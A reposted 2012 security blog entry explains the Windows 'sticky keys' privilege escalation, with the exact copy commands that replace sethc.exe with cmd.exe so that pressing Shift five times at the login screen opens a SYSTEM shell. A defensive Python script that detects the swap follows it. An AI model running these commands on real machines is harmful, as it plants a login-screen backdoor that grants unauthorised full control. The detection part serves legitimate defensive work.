Nytro

Privilege Escalation via "Sticky" Keys

Monday, April 30, 2012

This has been documented all over, but I like things to be on the blog so I can find them...

You can gain a SYSTEM shell on an application you have administrative access on, or if you have physical access to the box and can boot to a repair disk or Linux distro and can change files.

Make a copy somewhere of the original on-system sethc.exe:

copy c:\windows\system32\sethc.exe c:\

cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe

Copy cmd.exe into sethc.exe's place:

copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

or

cp /mnt/sda3/Windows/System32/cmd.exe /mnt/sda3/Windows/System32/sethc.exe

Reboot, hit the Shift key 5 times, and a SYSTEM shell will pop up; do your thing.

It would probably be nice to put sethc.exe back when you are done.

Posted by CG at 12:10 PM

Source: Carnal0wnage & Attack Research Blog: Privilege Escalation via "Sticky" Keys
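
From the defender's side, the swap described in the post leaves sethc.exe byte-identical to cmd.exe, which can be checked on a live host or on a mounted offline volume. The script below is an added example, not part of the original post or blog; the function names are hypothetical, and it assumes that a genuine sethc.exe carries its own name in the OriginalFilename string of its PE version resource.

```python
import hashlib
import re
import sys
from pathlib import Path

# UTF-16LE "OriginalFilename" key from a PE version resource, its NUL
# terminator plus optional alignment padding, then the UTF-16LE value.
_ORIG_NAME = re.compile(
    re.escape("OriginalFilename".encode("utf-16-le"))
    + rb"(?:\x00\x00){1,2}((?:[\x21-\x7e]\x00)+)"
)


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def original_filename(path: Path):
    """Return the OriginalFilename string embedded in the file, or None."""
    m = _ORIG_NAME.search(path.read_bytes())
    return m.group(1).decode("utf-16-le") if m else None


def check_sethc(system32: Path) -> list:
    """Return findings for sethc.exe under the given System32 directory."""
    sethc, cmd = system32 / "sethc.exe", system32 / "cmd.exe"
    findings = []
    if not sethc.is_file():
        return ["sethc.exe is missing"]
    # The replacement in the post is a straight file copy, so hashes match.
    if cmd.is_file() and sha256(sethc) == sha256(cmd):
        findings.append("sethc.exe is byte-identical to cmd.exe")
    name = original_filename(sethc)
    # Assumption: a genuine sethc.exe names itself in its version resource.
    if name is None:
        findings.append("sethc.exe has no OriginalFilename version string")
    elif name.lower() != "sethc.exe":
        findings.append(f"sethc.exe reports OriginalFilename {name!r}")
    return findings


if __name__ == "__main__":
    # Pass C:\Windows\System32 on a live host, or the same directory on a
    # mounted volume (e.g. /mnt/sda3/Windows/System32) for offline triage.
    for finding in check_sethc(Path(sys.argv[1])):
        print("ALERT:", finding)
```

An empty result means neither check fired; the version-string check is a raw byte heuristic rather than a full PE resource parse.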
